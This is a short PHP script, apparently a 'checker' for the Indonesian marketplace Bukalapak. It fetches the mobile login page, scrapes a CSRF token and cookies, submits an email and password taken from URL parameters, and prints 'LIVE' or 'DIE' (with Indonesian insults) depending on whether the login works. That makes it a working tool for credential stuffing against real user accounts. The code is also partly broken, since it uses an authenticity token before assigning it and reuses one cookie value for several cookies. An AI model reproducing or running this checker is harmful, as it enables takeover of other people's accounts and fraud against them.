w

1. <?php
2. $email = $_GET['e'];
3. $passw = $_GET['p'];
4. function getStr($string,$start,$end){
5. $str = explode($start,$string);
6. $str = explode($end,$str[1]);
7. return $str[0];
8. }
9. function inStr($s, $as){
10. $s = strtoupper($s);
11. if(!is_array($as)) $as=array($as);
12. for($i=0;$i<count($as);$i++) if(strpos(($s),strtoupper($as[$i]))!==false) return true;
13. return false;
14. }
15. // GET COOKIES
16. $asu = curl_init('https://m.bukalapak.com/login');
17. curl_setopt($asu, CURLOPT_RETURNTRANSFER, 1);
18. curl_setopt($asu, CURLOPT_HEADER, 1);
19. $result1 = curl_exec($asu);
20. $csrftoken = getStr($result1,'<meta name="csrf-token" content="','" />');
21. $cookie1 = getStr($result1, 'identity=',';');
22. $cookie2 = getStr($result1, 'browser_id=',';');
23. $cookie3 = getStr($result1, 'session_id=',';');
24. $cookie4 = getStr($result1, 'lskjfewjrh34ghj23brjh234=',';');
25. // CLOSE COOKIES
26.  
27. $ch = curl_init();
28.  
29. curl_setopt($ch, CURLOPT_URL, 'https://m.bukalapak.com/user_sessions');
30. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
31. curl_setopt($ch, CURLOPT_POSTFIELDS, "user_session%5Busername%5D=$email&user_session%5Bpassword%5D=$passw&user_session%5Bremember_me%5D=1&authenticity_token=$token&comeback=https%3A%2F%2Fm.bukalapak.com%2Flogin");
32. curl_setopt($ch, CURLOPT_POST, 1);
33. curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');
34.  
35. $headers = array();
36. $headers[] = 'Sec-Fetch-Mode: cors';
37. $headers[] = 'Origin: https://m.bukalapak.com';
38. $headers[] = 'Accept-Encoding: gzip, deflate, br';
39. $headers[] = 'X-Csrf-Token: '.$csrftoken.'';
40. $headers[] = 'Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7';
41. $headers[] = 'X-Requested-With: XMLHttpRequest';
42. $headers[] = 'Cookie: identity='.$cookie1.'; browser_id='.$cookie1.'; session_id='.$cookie1.'; _gcl_au=1.1.764660035.1565208447; _ga=GA1.2.1202074377.1565208447; _gid=GA1.2.1627118782.1565208447; __session:0.7533017368700892:=https:; __asc=09536c8416c6db1894e3b609bb6; __auc=09536c8416c6db1894e3b609bb6; _gat=1; request_method=POST; lskjfewjrh34ghj23brjh234='.$cookie4.'; _vwo_uuid_v2=D9CB4C7E837E7B97F70B8DCA2424A7BE8|1dbbd25f5687db03dacb00d9d03f43f0; _td=02f17c3d-9a73-41d2-ed35-2a5953002668; _fbp=fb.1.1565208452120.139513883';
43. $headers[] = 'X-Newrelic-Id: VQcDWF9ADgIJVVBQ';
44. $headers[] = 'User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30';
45. $headers[] = 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8';
46. $headers[] = 'Accept: */*';
47. $headers[] = 'Referer: https://m.bukalapak.com/login';
48. $headers[] = 'Authority: m.bukalapak.com';
49. $headers[] = 'Sec-Fetch-Site: same-origin';
50. curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
51. $result = curl_exec($ch);
52. $token = getStr($result,'<input type="hidden" name="authenticity_token" value="','" />');
53. if(preg_match('/Silakan coba lagi/i',$result)){
54. echo "DIE ANJING";
55. }else{
56. echo "LIVE BABI";
57. }
58. ?>